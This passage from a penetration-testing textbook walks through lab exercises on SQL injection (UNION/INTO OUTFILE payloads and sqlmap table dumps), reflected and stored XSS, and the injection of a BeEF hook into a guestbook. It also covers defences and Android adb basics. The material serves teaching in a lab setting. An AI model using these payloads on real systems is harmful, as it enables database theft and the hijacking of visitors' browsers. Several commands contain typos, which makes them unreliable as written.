2. As you can see from above screenshot, I got the output of file
/etc/passwd

3. To write to the website insert the following code in the URL

union select null, ‘example example’ ,null,null,null into outfile

‘/var/www/mutillidae/example.txt’

4. This will attempt to write a text file to /var/www/mutillidae

S_E_Oblako

5. That did not work because we don’t have a permission to write to

the folder /var/www/mutillidae
6. If we replace that with folder /temp and test

7. And insert it again

S_E_Oblako

8. Because there is no SQL error, it means the file is written. To

check, we go to the Metasploitable machine and check the file.

13.6. Using Sqlmap tool

Sqlmap is an open source penetration testing tool that automates the process
of detecting and exploiting SQL injection flaws and taking over of database
S_E_Oblako

servers. It comes with a powerful detection engine, many niche features for
the ultimate penetration tester and a broad range of switches lasting from
database fingerprinting, over data fetching from the database, to accessing the
underlying file system and executing commands on the operating system via
out-of-band connections.
In all the previous examples we were injecting using manual methods to
discover and inject SQL, in the following example we will use sqlmap tool
which automate the discovery and penetration of SQL injection.
Sqlmap is a tool that come part of Kali Linux and it is designed to exploit
SQL injections, the tool works with many database types such as
mysql,MSsql,..etc.
Exercise 59: Using Sqlmap tool
1. Open Kali browser and go to Metasplitable virtual machine web
page http://10.0.2.5/Mutillidae

2. Go to the login page and copy the URL

3. Open Terminal Windows and type

#sqlmap –level 3 -u <the link from url>

#sqlmap –level 3 –u http://10.0.2.6/mutillidae/index.php?page=user.info
S_E_Oblako

4. The tool found the database type as MySQL , PHP version and
Apach2 version
5. Sqlmap tool figured out that system is Linux Ubuntu 8.4 and the
database is MySQL 5.0.12 and it stored the information it found in
a test file.
6. Type

#sqlmap --help to know more about the tool

S_E_Oblako

7. To see the databases, type the same command followed by –dbs

#sqlmap –level 3 –u http://10.0.2.6/mutillidae/index.php?

page=user.info –-dbs

8. Answer No to the using own cookies

S_E_Oblako

9. Checking current Database

10. To see all the tables inside the owasp10 database

Note
sqlmap is slow when retrieving information from database
files, depending on the size of the database it may take
more than 15 minutes to finish.
S_E_Oblako
S_E_Oblako

11. To get dump of all data from table account in owasp10 database

#sqlmap –u http://10.0.2.6/multillidae/index.php -T accounts -D

owasp10 –-dump

12. This command makes a complete dump to a table inside the

targeted database and it store the dump at

/root/.sqlmap/output/10.0.2.6/dump/
S_E_Oblako

13. To see the stored dump file

# cd /home/kali
#ls -al
S_E_Oblako
S_E_Oblako

13.7. Protection from SQL injection

Filters

In some situations, an application that is vulnerable to SQL

injection (SQLi) may implement various input filters that prevent from
exploiting the flaw without restrictions. For example, the application
may remove or sanitize certain characters or may block common SQL
keywords. In this situation. There are numerous tricks you can try to
bypass filters of this kind.

Blacklist of some commands

Some programmers block some SQL commands like union and other to
stop SQL injection but again this method is not secure and can be
bypassed.

Using Prepared statement, Separate Data from SQL code

The use of prepared statements with variable binding (aka parameterized

queries) is how all developers should first be taught how to write
database queries. They are simple to write, and easier to understand than
dynamic queries. Parameterized queries force the developer to first
define all the SQL code, and then pass in each parameter to the query
later. This coding style allows the database to distinguish between code
and data, regardless of what user input is supplied.
Prepared statements ensure that an attacker is not able to change the
intent of a query, even if SQL commands are inserted by an attacker. In
the safe example below, if an attacker were to enter the userID of tom'
or '1'='1, the parameterized query would not be vulnerable and would
instead look for a username which literally matched the entire string
tom' or '1'='1.
Using a least privileged Database Account

To minimize the potential damage of a successful SQL injection attack,

you should minimize the privileges assigned to every database account
in your environment. Do not assign DBA or admin type access rights to
S_E_Oblako

your application accounts. We understand that this is easy, and

everything just ‘works’ when you do it this way, but it is extremely
dangerous. Start from the ground up to determine what access rights
your application accounts require, rather than trying to figure out what
access rights you need to take away. Make sure that accounts that only
need read access are only granted read access to the tables they need
access to. If an account only needs access to portions of a table, consider
creating a view that limits access to that portion of the data and
assigning the account access to the view instead, rather than the
underlying table. Rarely, if ever, grant create or delete access to
database accounts.
If you adopt a policy where you use stored procedures everywhere, and
do not allow application accounts to directly execute their own queries,
then restrict those accounts to only be able to execute the stored
procedures they need. Do not grant them any rights directly to the tables
in the database.
SQL injection is not the only threat to your database data. Attackers can
simply change the parameter values from one of the legal values they
are presented with, to a value that is unauthorized for them, but the
application itself might be authorized to access. As such, minimizing the
privileges granted to your application will reduce the likelihood of such
unauthorized access attempts, even when an attacker is not trying to use
SQL injection as part of their exploit.
While you are at it, you should minimize the privileges of the operating
system account that the DBMS runs under. Do not run your DBMS as
root or system! Most DBMSs run out of the box with an immensely
powerful system account. For example, MySQL runs as system on
Windows by default. Change the DBMS's OS account to something
more appropriate, with restricted privileges
Multiple DB Users

The designer of web applications should not only avoid using the same
owner/admin account in the web applications to connect to the database.
Different DB users could be used for different web applications. In
general, each separate web application that requires access to the
database could have a designated database user account that the web-
app will use to connect to the DB. That way, the designer of the
S_E_Oblako

application can have good granularity in the access control, thus

reducing the privileges as much as possible. Each DB user will then
have select access to what it needs only, and write-access as needed.
As an example, a login page requires read access to the username and
password fields of a table, but no write access of any form (no insert,
update, or delete). However, the sign-up page certainly requires insert
privilege to that table; this restriction can only be enforced if these web
apps use different DB users to connect to the database.
Using WAF (Web Application Firewall)

Web Application Firewall (WAF) that inspect the HTTP traffic coming
or going out the web site and can prevent attacks stemming from web
application security flaws, such as SQL injection, Cross-site scripting
(XSS), file inclusion and other security flaws. WAF can be network
bases or cloud based.
S_E_Oblako

14
Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection, in which

malicious scripts are injected into trusted websites. XSS attacks
occur when an attacker injects a Java script into a web application,
the Java script will be executed in users’ browsers when they
access the Website. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input
from a user within the output it generates without validating or
encoding it. The end user’s browser has no way to know that the
script should not be trusted and will execute the script. Because it
thinks the script came from a trusted source, the malicious script
can access any cookies, session tokens, or other sensitive
information retained by the browser and used with that site. These
scripts can even rewrite the content of the HTML page.
S_E_Oblako

14. Cross Site Scripting XSS

Cross Site scripting vulnerability allow attacker to insert a java script to a
web page, Java script is a client side scripting language, so when it is
executed, it will be executed in the Client machine not in the server side.
When a Java script is inserted in a website the script will run in the machines
of people who browse the web page, the web server is used as a deliverer of
the code.
There are three types of XSS vulnerabilities:

Persistent/stored XSS

The Java script will be stored in the web page so that any time a user
browse the page the code will be executed in his machine.

Reflected XSS

Attacker create a URL and send it to a user, the code will be executed
when the user clicks on the URL.

DOM Based XSS

The Dom based is the Java script is run in the Client side without any
communication with the webserver, the code is interpreted and run in
the web browser.
14.1. Discovering XSS vulnerabilities
The easiest way to discover that the website has XSS vulnerability is to look
for forms or other user input points that end up re displaying or reusing the
user data on the site. For example, if there is a box where you can enter your
name and your name is then displayed on the next webpage, then entering a
script may cause the script to run on the following page because the script
gets interpreted as part of the html instead of a string value. This will only
work if user input to the site is not html encoded (as it should be) on the site,
or if you can come up with some obfuscated script that will run despite html
encoding. There are also many tools that scan websites for XSS vulnerability
such as OWASP ZAP tool.
To find XSS vulnerability in any website.
S_E_Oblako

find all the input fields like search, comment box, username,
password, feedback form, contact form.
One by one try to inject a simple script like this <script>alert(“hello
Anonymous”)</script>. Try this simple script on every text field
and analyze the response. if script is run successful and show the
alert box ,than website have the XSS vulnerability .

Exercise 60: Example of Reflected XSS

1. Start Metasploitable machine
2. From Kali open web browser and go to DVWA page
3. Login admin/password, and change the security to low

4. Click on XSS Reflected tap

5. The page will ask you to put your Name and it will Replay with
Hello
6. This is just an example, the idea is that you can inject Java code into
text boxes, also looking at the URL you can see that it is a GET
S_E_Oblako

URL then you can inject on the URL as well.

7. In the Text box where the site asks, “what’s your name?” enter the
following basic java script:

<script>alert(“XSS TEST”)</script>
and click submit
S_E_Oblako
S_E_Oblako

8. If you look at the URL

9. Now if you send this URL to anyone, they will get the code
executed and the get the Alert box.

14.2. Stored XSS vulnerabilities

Cross-site Scripting (XSS) is a client-side code injection attack. The attacker
aims to execute malicious scripts in a web browser of the victim by including
malicious code in a legitimate web page or web application. The actual attack
occurs when the victim visits the web page or web application that executes
the malicious code. The web page or web application becomes a vehicle to
deliver the malicious script to the user’s browser. Vulnerable vehicles that are
commonly used for Cross-site Scripting attacks are forums, message boards,
and web pages that allow comments.
A web page or web application is vulnerable to XSS if it uses unsensitized
user input in the output that it generates. This user input must then be parsed
by the victim’s browser.
Exercise 61: Example of Stored XSS
1. Open Kali to DVWA webpage and login
2. Click on Stored XSS and write and a name and message.
S_E_Oblako

3. Open the Windows machine and go to Metasploitable webpage to

DVWA then XSS stored tap, you will see the message that written
by the Kali user.

Note
This exresie require three virtual machines opened at the same time (
Metasplitable, Windows 10 and Kali Linux) if the Laptop used is less than 8
G RAM, the laptop performance will be impacted and it will be very slow.
S_E_Oblako

4. Now go back to Kali machine and enter java code in the message
body as in the following screenshot
S_E_Oblako

5. Click on Sign Guestbook

6. Go back to Windows 10 machine and just refresh the page in the

browser, you will notice that the java code is executed, and you will
S_E_Oblako

receive the alert.

S_E_Oblako

14.3. Injecting BeEF hook as a stored XSS

As we have seen in chapter 9, BeEF code allow us to track, monitor and
exploit any machine access a Website that have BeEF hook code. If a website
has Stored XSS vulnerability attackers can utilize this vulnerability to inject
BeEF hook java code. This will compromise any machine that access that
website.
Exercise 62: Injecting BeEF hook as stored XSS
We explained Beef in Chapter 9 how it can take control of a machine through
web browser hooks. In this lesson we are going to inject BeEF hook into a
web page as stored XSS, zny person access this page will be hooked to Beef
automatically.

1. In Kali machine open Beef

#cd /opt/beef
#./beef

2. Open web browser and go to Beef URL link

http://127.0.0.1:3000/ui/panel
S_E_Oblako

3. Login as beef/beef

Note
If you forget Beef username and password check the file
/opt/beef/config.yaml

4. Copy Beef Hook

S_E_Oblako

5. Insert the hook in the message body, then change the IP address to
Kali IP address. you will need to extend the max. characters of the
message body, inside the browser to 500 by:
In Kali machine Firefox that showing the DVWA webpage
Right click and then click on inspect element
Change maxlength to 500
S_E_Oblako

6. Add the hook URL in a java script to the message body then click
Sign Guestbook

7. The Script run in kali machine and it is hooked to BeEF

8. From windows machine just refresh the XSS stored webpage
9. See Beef webpage in Kali Linux
S_E_Oblako

10. The windows machine will be hooked because the stored hook
in the webpage connect windows machine to the beef command
center page.
S_E_Oblako

14.4. Preventing XSS Vulnerability

Escaping
The first method you can and should use to prevent XSS vulnerabilities from
appearing in your applications is by escaping user input. Escaping data means
taking the data an application has received and ensuring it is secure before
rendering it for the end user. By escaping user input, key characters in the
data received by a web page will be prevented from being interpreted in any
malicious way. In essence, you’re censoring the data your web page receives
in a way that will disallow the characters – especially “< “and “>” characters
– from being rendered, which otherwise could cause harm to the application
and/or users.
If the page does not allow users to add their own code to the page, a good
rule of thumb is to escape all HTML, URL, and JavaScript entities. However,
if the web page does allow users to add rich text, such as on forums or post
comments, you have a few choices. You’ll either need to carefully choose
which HTML entities you will escape and which you won’t, or by using a
replacement format for raw HTML such as Markdown, which will in turn
allow you to continue escaping all HTML.
Validating Input
Any untrusted data should be treated as malicious. What’s untrusted data?
Anything that originates from outside the system and you don’t have
absolute control over so that includes form data, query strings, cookies, other
request headers, data from other systems (i.e. from web services) and
basically anything that you can’t be 100% confident doesn’t contain evil
things.”
Validating input is the process of ensuring an application is rendering the
correct data and preventing malicious data from doing harm to the site,
database, and users. While whitelisting and input validation are more
commonly associated with SQL injection, they can also be used as an
additional method of prevention for XSS. Whereas blacklisting, or
disallowing certain, predetermined characters in user input, disallows only
known bad characters, whitelisting only allows known good characters and is
a better method for preventing XSS attacks as well as others.
Input validation is especially helpful and good at preventing XSS in forms, as
it prevents a user from adding special characters into the fields, instead
refusing the request. However, as OWASP maintains, input validation is not
a primary prevention method for vulnerabilities such as XSS and SQL
S_E_Oblako

injection, but instead helps to reduce the effects should an attacker discover
such a vulnerability.
Sanitizing
A third way to prevent cross-site scripting attacks is to sanitize user input.
Sanitizing data is a strong defense but should not be used alone to battle XSS
attacks. It is totally possible you’ll find the need to use all three methods of
prevention in working towards a more secure application. Sanitizing user
input is especially helpful on sites that allow HTML markup, to ensure data
received can do no harm to users as well as your database by scrubbing the
data clean of potentially harmful markup, changing unacceptable user input
to an acceptable format.
WAF
we explained in in previous chapters WAF can protect against XSS attacks.
S_E_Oblako

15
OWASP ZAP
Web Pen-Testing tool

The OWASP Zed Attack Proxy (ZAP) is one of the world’s most
popular free security tools and is actively maintained by hundreds
of international volunteers. The OWASP ZAP tool automate the
Website penetration testing and it is used by most Penetration
Testers.
S_E_Oblako

15. OWASP ZAP Web Site Penetration testing tool

OWASP ZAP tool which comes part of Kali is a tool that can-do
vulnerability scanning and penetration testing of web site automatically, the
tool run all the testing we did manual in the above sections and more.
15.1. Scanning Websites using OWASP-ZAP tool
Exercise 63: Running OWASP ZAP
1. To run the tool, go to Kali application and search for ZAP.
S_E_Oblako

2. Start the tool

3. Click Start , then Tools / options, will allow you to modify the
options
S_E_Oblako

4. Choose Default policy then click OK

5. Click on automated scan

Exercise 64: Start Website scan

6. To start scan, type the URL in the page

7. Then click Attack

8. The Attack will take some time to finish, the tool will first try to
find all pages in the website then it will start attack based on the
policy we used.
9. You can monitor the attack progress by clicking on the graph icon
beside the progress status bar under active scan tap.
S_E_Oblako

Exercise 65: Scan Analysis

When the scan finish, it will give a summary of found vulnerabilities in the
page categorized based on the severity of the vulnerability as shown in the
screenshot below:

10. The ZAP tool successfully discovered 13 red , 8 orange and 7

yellow flags. clicking on the alerts will show the details of the alert
S_E_Oblako

and what information the tool was successful to get from the
website, for example in the below screen shot, the tool was able to
read /ect/passwd file
S_E_Oblako

16
Mobile Phone Penetration Testing

In this section we will take brief look at the major threats which are
present in current mobile devices with a focus on IOs and Android
as these two accounts for 90% of the global mobile device market.
This section will include the following topics:
• Mobile Phone attack victors.
• App stores
• Introduction to Android OS
• Introduction to Apple iOS
• Practical exercises about how to hack android devices
S_E_Oblako

16. Mobile phone penetration testing

16.1. Introduction
The Current global estimate of mobile devices is around 14 billion, with an
estimated 3.5 billion users. The number of devices is anticipated to increase
to 16.8 billion by the year 2023

.
With the world growing ever dependent on mobile services such as online
banking, social media, ecommerce and more, the amount of sensitive data
being transmitted is truly staggering. This mobile revolution has resulted in
mobile security becoming the new front line of cyber security.
The concept of mobile security revolves around identifying the vulnerabilities
within mobile devices, the possible ways these vulnerabilities can be
exploited and how to protect against cybercriminals who may try to use these
exploits.
In this section we will take brief look at the major threats which are present in
current mobile devices with a focus on IOs and Android as these two
accounts for 90% of the global mobile device market.
This section will include the following topics:

Mobile Phone attack victors.

App stores
Introduction to Android OS
Introduction to Apple iOS
Practical exercises about how to hack android devices

16.2. Mobile phone attack vectors

Attack Vector is a method or technique that a hacker uses to gain access to
S_E_Oblako

another computing device or network to inject a “bad code” often called

payload. This vector helps hackers to exploit system vulnerabilities. Many of
these attack vectors take advantage of the human element as it is the weakest
point of this system.
Mobile phones attack vectors are listed in the table below:

16.3. Outcomes of attack vectors

Data Loss: stored data in the mobile phone is lost and taken by the
attacker.
Use of mobile resources: attacker may install a bot software to
attack other networks such as launching DDOS attack using the
victim mobile phone.
Reputation loss: The attacker may use the victim social networks
accounts such as twitter, Facebook, or victim email to send fake
S_E_Oblako

messages to the victim friends and business partners or send threats

to others which might damage the victim reputation.
Identity theft: the attacker may use the victim data found in the
mobile phone such as victim photos, name, address, credit card to
fake victim identity.
Mobile phone attack lifecycle
The mobile phone attack lifecycle starts with the infection phase then
installation of a backdoor and data exfiltration.

Device Infection
Device infection with spyware is performed differently for Android and iOS
devices.

Android: Victims are tricked to download an APK file from a

third-party source generally using social engineering attack, the
android feature to allow “Install unknown apps” must be turned
on for external APK files to be installed. The attacker tricks the
victim by offering for free an application that is not free in the
Google play store, giving victim instruction to allow APK from
unknown sources.
iOS: iOS infection requires physical access to the mobile.
Infecting the device can also be through exploiting a zero-day
such as the JailbreakME exploit.

Backdoor Installation
To install a backdoor requires administrator privileges by rooting Android
devices and jailbreaking Apple devices. Despite device manufacturers
placing rooting/jailbreaking detection mechanisms, mobile spyware can
easily bypass them.

Android: Rooting detection mechanisms do not apply to

intentional rooting.
iOS: The jailbreaking “community” is vociferous and
S_E_Oblako

motivated.

Data Exfiltration
Spyware sends mobile content such as encrypted emails and messages to the
attacker servers in plain text. The spyware does not directly attack the secure
container. It grabs the data at the point where the user pulls up data from the
secure container to read it. At that stage, when the content is decrypted for the
user’s usage, the spyware takes controls of the content and sends it on.

16.5. App Stores

Google (Play store) and Apple (AppStore) are a centralized marketplace for
authenticated developers to show and sell their mobile applications. The
mobile applications developed by developers are submitted to these
marketplaces making them available to millions of mobile users. If you are
downloading the application from an official app store, then you can trust the
application as the hosting store has vetted it. However, if you are
downloading the application from a third-party app store, then there is a
possibility of downloading malware along with the application because third-
party app stores do not vet the apps.
The attacker downloads a legitimate mobile app such as a game and
S_E_Oblako

repackages it with malware or backdoor and uploads the mobile apps to a

third-party application store from where the end users download this
malicious gaming application, believing it to be genuine. As a result, the
malware gathers and sends user credentials such as call logs, photo, videos,
and sensitive docs to the attacker without the user's knowledge. The backdoor
will enable the attacker to upload more malicious software to victim machine
and use it to attack other devices and networks.
16.6. Introduction Android OS
Android OS is developed by Google for mobile devices with processing
capabilities for smartphones and tablets. Its kernel is based on Linux and
installed applications run in a sandbox.
Sandbox
Android provides layer of protection because it does not give one application
access to the resource of another application. This is known as the ‘sandbox’
where every application plays in its own sandbox and cannot use another
application’s resources, Android does this by giving each application a
unique user id (UID), the application will be running as a separate process
with that UID. Only processes with the same UIDs can share resources
which, as each ID is uniquely assigned, means that no other apps have
permission.
This means that if an application attempts to do something it shouldn’t, like
read the data from another application, or dial the phone (which is a separate
application) then Android protects against this because the app doesn’t have
the right privileges. Android antiviruses like Kaspersky, MacAfee, and AVG
Technologies runs under sandbox also which lead to limit antivirus scanning
environment.
Permissions
Because Android applications are sandboxed, they can access only their own
files and any world-accessible resources on the device. Such a limited
application would not be remarkably interesting though, and Android can
grant additional, fine-grained access rights to applications to allow for richer
functionality. Those access rights are called permissions, and they can control
access to hardware devices, Internet connectivity, data, or OS services.
Applications can request permissions by defining them in the
AndroidManifest.xml file. At application install time, Android inspects the
list of requested permissions and decides whether to grant them or not. Once
S_E_Oblako

granted, permissions cannot be revoked, and they are available to the

application without any additional confirmation.
Additionally, for features such as private key or user account access, explicit
user confirmation is required for each accessed object, even if the requesting
application has been granted the corresponding permission. Some permission
can only be granted to applications that are part of the Android OS, either
because they are preinstalled or signed with the same key as the OS. Third-
party applications can define custom permissions and define similar
restrictions known as permission protection levels, thus restricting access to
an app’s services and resources to apps created by the same author.
Permission can be enforced at different levels. Requests to lower-level
system resources, such as device files, are enforced by the Linux kernel by
checking the UID or GID of the calling process against the resource’s owner
and access bits. When accessing higher-level Android components,
enforcement is performed either by the Android OS or by each component
(or both).
How android Antivirus software works
The primary job of many Android antivirus applications is to scan for
applications from unofficial third parties and check against a known list of
compromised applications. This is highly dependent on the antivirus
application having an updated list of compromised apps. Android anti-
malware also often looks for rooted devices. Users may root a phone to
access features and information, bypass the sandboxing features that ask for
access to contacts, texts and more, or to access new or custom ROMs.
Note that by default android devices does not allow installation of
applications from unknown sources and the users must manually enable the
device to allow installing application from unknown sources. Rooting
android device is totally not recommended, and many android devices
manufactures warn users if they root the device, they will lose device
warranty.
Google Play Protect
Google Play Protect automatically scans all the apps on Android phones and
works to prevent the installation of harmful apps, making it the most widely
deployed mobile threat protection service in the world.
Android Runtime ART
Android Runtime ART is a process virtual machine to isolate each running
application in android from the OS kernel and from other running
S_E_Oblako

application, ART Replaced Dlavik virtual machine runtime since Android 5

(Lollipop).

16.7. Android Authentication (screen lock)

Android screen lock uses four methods to secure android devices, Patterns,
PIN code, Password and Biometrics (face recognition and fingerprint).
Biometrics require setting PIN or a password.
Below some of the android screen lock characteristics:
S_E_Oblako

Locking screen dependent in two factors PIN code (4 or more

digits) or Password+ Device User ID (UID).
The device user ID is a physical ID part of the device itself.
Android mix the two to create a hash that used to allow access and
used in device data encryption or had disk encryption.
Offline brute force does not work with android phones because the
phone PIN code must be used physically on the phone and cannot
be used remotely.
Android allow 5 consecutive wrong PIN code to be entered then it
apply lock on the device for 30 seconds after each wrong PIN code
entered for another 5 times then the Lock time increased to 5
minutes after each wrong PIN entered.
Find my phone feature, if it is enabled it will allow the user to Erase
the data on the device remotely when the device connected to the
internet.

16.8. Introduction to Apple iOS

iOS (formerly iPhone OS) is a mobile operating system created and
developed by Apple Inc. exclusively for its hardware. It is the operating
system that powers many of the company's mobile devices, including the
iPhone and iPod Touch; it also powered the iPad until the introduction of
iPadOS, a derivative of iOS, in 2019. It is the world's second-most widely
S_E_Oblako

installed mobile operating system, after Android. It is the basis for three other
operating systems made by Apple: iPadOS, tvOS, and watchOS. It is
proprietary software, although some parts of it are open source under the
Apple Public Source License and other licenses.
Unveiled in 2007 for the first-generation iPhone, iOS has since been
extended to support other Apple devices such as the iPod Touch (September
2007) and the iPad (January 2010). As of March 2018, Apple's App Store
contains more than 2.1 million iOS applications.
Major versions of iOS are released annually. The current stable version, iOS
14, was released to the public on September 16, 2020.It brought many user
interface changes, including the ability to place widgets on the home screen, a
compact UI for both Siri and phone calls, and the ability to change both the
default web browser and email apps.
S_E_Oblako

Applications
iOS devices come with preinstalled Apple apps including Email, Apple
Maps, TV, FaceTime, Podcast, Wallet, Health, and many more.
Applications ("apps") are the most general form of application software that
can be installed on iOS. They are downloaded from the official catalog of the
App Store digital store, where apps are subjected to security checks before
being made available to users. IOS applications can also be installed directly
from an IPA file provided by the software distributor, via unofficial ways.
S_E_Oblako

They are written using iOS Software Development Kit (SDK) and, often,
combined with Xcode, using officially supported programming languages,
including Swift and Objective-C. Other companies have also created tools
that allow for the development of native iOS apps using their respective
programming languages.
The SDK includes an inclusive set of development tools, including an audio
mixer and an iPhone simulator. It is a free download for Mac users. It is not
available for Microsoft Windows PCs. To test the application, get technical
support, and distribute applications through App Store, developers are
required to subscribe to the Apple Developer Program.
IPA files
IPA files are similar to android APK files, executable files that can run
application in iPhone from outside the app store and there are many ways to
install the files into the iPhone such as through a PC using program called
Cydia Impactor or over the air using a website. iOS using sandbox method to
isolate apps so if the iPhone is not jailbroken the application will be
extremely limited.
Jailbreaking iOS
Jailbreaking is taking control of the iOS operating system that is used on
Apple devices, in simple words it is the same as Rooting Android devices. It
removes the device from the dependencies on exclusive Apple source
applications and allows the user to use third-party apps unavailable at the
official app store.
It is accomplished by installing a modified set of kernel patches that allows
you to run third-party applications not signed by the OS vendor. It is used to
add more functionality to standard Apple gadgets. It can also provide root
access to the operating system and permits download of third-party
applications, themes, extensions, etc. This removes sandbox restrictions,
which enables malicious apps to access restricted mobile resources and
information.
Jailbreaking, like rooting, also has some security risks to your device:

Voids your phone's warranty

Poor performance
Malware infection
S_E_Oblako

16.9. iOS Authentication (screen lock)

iOS screen lock uses 4 to 6 digits passcode , face ID ( face recognition )plus
passcode and touch ID ( finger print) plus passcode , the passcode alongside
with Device ID used by iOS to create encryption key that encrypt all iPhone
or iPad files in the disk.

Below some of the iOS screen lock characteristics:

Unique Device ID (UID) is a unique identifier for a single device

that is fetched from Apple servers when a user tries to activate the
device using iCloud or the Setup app. This ID is also used by iTunes
to detect the phone or to communicate with it while restoring the
iPSW firmware.
IPSW is a file format used in iTunes to install iOS firmware. All
Apple devices share the same IPSW file format for iOS firmware,
allowing users to flash their devices through iTunes on macOS and
Windows
Passcode key is derived by hashing passcode and Device ID.
Hashing uses secret UID (Unique Device Identifier) on secure
enclave.
After 5 wrong passcodes, iOS will put 1-minute delay between
attempts.
After the 9th attempt the delay will be one hour.
After the 10th failed attempt, the erase phone procedure will start
and erase all phone data.
Offline Brute force does not work.
Online brute force will lead to the phone erase data after 10
attempts, so it does not work also.
S_E_Oblako

Apple Find my phone app used to track the iPhone location, play
sound, and erase data.

Mobile Device Management (MDM) software:

MDM is an enterprise software to manage and control employee
mobile phones. Both android and iOS have an API to allow the
remote administration of the devices that include changing the
device passcode, erasing device data and more.

16.10. Mobile Application Penetration Testing

There are several ways to test android and iOS Mobile applications, OWASP
published the OWASP Mobile Top 10 list (https://owasp.org/www-project-
mobile-top-10/) which Penetration testers should try to verify the security of
the Mobile application.
OWASP Mobile Top 10 Risks:
1- M1: Improper Platform Usage
This category covers misuse of a platform feature or failure to use platform
security controls. It might include Android intents, platform permissions,
misuse of Touch ID, the Keychain, or some other security control that is part
of the mobile operating system.
2- M2: Insecure Data Storage
Threats agents include the following: an adversary that has attained a
lost/stolen mobile device; malware or another repackaged app acting on the
adversary’s behalf that executes on the mobile device.
3- M3 Insecure Communication
When designing a mobile application, data is commonly exchanged in a
client-server fashion. When the solution transmits its data, it must traverse the
mobile device’s carrier network and the internet. Threat agents might exploit
vulnerabilities to intercept sensitive data while it’s traveling across the wire.
The following threat agents exist:

An adversary that shares your local network

(compromised or monitored Wi-Fi).
Carrier or network devices (routers, cell towers, proxy’s,
etc).
S_E_Oblako

Malware on your mobile device.

4- Insecure Authentication
Threat agents that exploit authentication vulnerabilities typically do so
through automated attacks that use available or custom-built tools.
5- Insufficient cryptography
Threat agents include the following: anyone with physical access to data that
has been encrypted improperly, or mobile malware acting on an adversary’s
behalf.
6- Insecure Authorization
Threat agents that exploit authorization vulnerabilities typically do so through
automated attacks that use available or custom-built tools
7- Poor Code Quality
Threat Agents include entities that can pass untrusted inputs to method calls
made within mobile code. These types of issues are not necessarily security
issues in and of themselves but lead to security vulnerabilities. For example,
buffer overflows within older versions of Safari (a poor code quality
vulnerability) led to high risk drive-by Jailbreak attacks. Poor code-quality
issues are typically exploited via malware or phishing scams.
8- Code Tampering
Typically, an attacker will exploit code modification via malicious forms of
the apps hosted in third-party app stores. The attacker may also trick the user
into installing the app via phishing attacks.
9- Reverse Engineering
An attacker will typically download the targeted app from an app store and
analyze it within their own local environment using a suite of different tools.
10- Extraneous Functionality
Typically, an attacker seeks to understand extraneous functionality within a
mobile app to discover hidden functionality in in backend systems. The
attacker will typically exploit extraneous functionality directly from their
own systems without any involvement by end-users.
S_E_Oblako

Exercise 66: Setting up Android testing environment

The following tools needed to test Android devices:

Android Studio for PC mainly to use Android phone emulator.

Android SDK for PC to use ADB tool to communicate and
send commands to android phone emulator and physical
android phone.
Physical android phone

Note
For this exercise we are going to use Windows machine because the Android
Phone emulator comes with its own virtual environment and if it installed
inside virtual machine it will not work, because virtual machines need
hardware acceleration. You cannot run a virtual machine inside a virtual
machine. Kali Machine that we were using in the previous exercises is a
virtual machine and we cannot use for the Android Testing. If you have Kali
as the main OS, then you can use the above-mentioned tools with Kali.
Android Studio is the official Integrated Development
Environment (IDE) for Android app development, based on IntelliJ
IDEA. On top of IntelliJ's powerful code editor and developer tools,
Android Studio offers even more features that enhance your
productivity when building Android apps, such as:

A flexible Gradle-based build system.

A fast and feature-rich emulator.
A unified environment where you can develop for all Android
devices.
Apply Changes to push code and resource changes to your
running app without restarting your app.
Code templates and GitHub integration to help you build
common app features and import sample code
Extensive testing tools and frameworks.
Lint tools to catch performance, usability, version
compatibility, and other problems
C++ and NDK support.
Built-in support for Google Cloud Platform, making it easy to
integrate Google Cloud Messaging and App Engine
S_E_Oblako

Android Studio minimum requirements:

Microsoft® Windows® 7/8/10 (64-bit).
4 GB RAM minimum, 8 GB RAM recommended.
2 GB of available disk space minimum.
4 GB Recommended (500 MB for IDE + 1.5 GB for
Android SDK and emulator system image).
1280 x 800 minimum screen resolution.
1. Download and Install Android Studio from
https://developer.android.com/.

2. Download and install SDK from https://developer.android.com/

3. The SDK contain Android Debug Bridge (ADB)

Android Debug Bridge (adb)

Android Debug Bridge (adb) is a versatile command-line tool that lets you
S_E_Oblako

communicate with android device. The adb command facilitates a variety of

device actions, such as installing and debugging apps, and it provides access
to a Unix shell that you can use to run a variety of commands on a device. It
is a client-server program that includes three components:

A client sends commands to the development machine. You can

invoke a client from a command-line terminal by issuing an adb
command.
A daemon (adbd), which runs commands on a device. The
daemon runs as a background process on each device.
A server, which manages communication between the client
and the daemon. The server runs as a background process on
your development machine.

4- Start Android Studio and start new project for the first time.
5- In Android Studio open AVD Manager.
6- Choose Pixel or you can create new Virtual Device by clicking on the +
sign
7- Start the virtual device

8- Navigate to the SDK file downloaded the folder is called Platform-tools

and unzip it
S_E_Oblako

9- Right click in the space + shift key to open PowerShell windows

10- Type >./adb to see the tool help menu.

S_E_Oblako

11- Type >./adb devices to connect to emulator.

12- Type >./adb shell to get access to android shell

11. Note that I get root access privilege because the emulator is rooted.
S_E_Oblako

12. Type #top to see all the running processes in the virtual android
device.

13. Type Ctrl + C to exit top

14. Type #exit to exit from the shell
15. Close the virtual phone emulator
16. Make sure the virtual phone emulator is not connected to the ADB
tool

Exercise 67: Connecting a Physical android Phone to ADB tool

1. Enable USB debugging in the Physical Phone
2. I am using Samsung S8+ for the test, below the procedure on how
to enable USB debugging for Samsung galaxy S8 , it might be
slightly different for other android devices.
S_E_Oblako

3. Make sure adb terminal is running

4. Connect the phone via usb cable to the PC

5. Answer Okay to allow USB debugging in the phone

6. In adb terminal type >adb devices
S_E_Oblako

7. In adb terminal type ./adb devices

S_E_Oblako

8. Notice that although I am connected to the phone, I don’t have root

permission because the devices is not rooted. I have user permission
with limited access to some files and folders inside the phone.
9. Type >./adb shell
10. Type #whoami ( the user is shell )
11. Type #la -al ( notice that there are some folders have access
permission denied because the user shell does not have root
privileges as the phone is not rooted)
12. Type # top to see the running processes in the phone
S_E_Oblako

13. Type ctrl +c

Exercise 68: Downloading a file or folder from Phone to PC

1. Navigate to the file/folder you want to download

>./adb shell
#cd sdcrad
#cd DCIM
cd screenshots
#pwd

2. Copy the complete link to the files you want to download

3. Use pull command to download a folder or a file from the Phone to
the PC and push command to upload files from the PC to the phone.
S_E_Oblako

4. Type >./adb pull /sdcard/DCIM/screenshots

S_E_Oblako

5. The folder will be downloaded to the Windows machine with all it

contents.

Exercise 69: Installing APK files into Android Virtual machine

In this exercise we are going to download DIVA APK,. DIVA (Damn
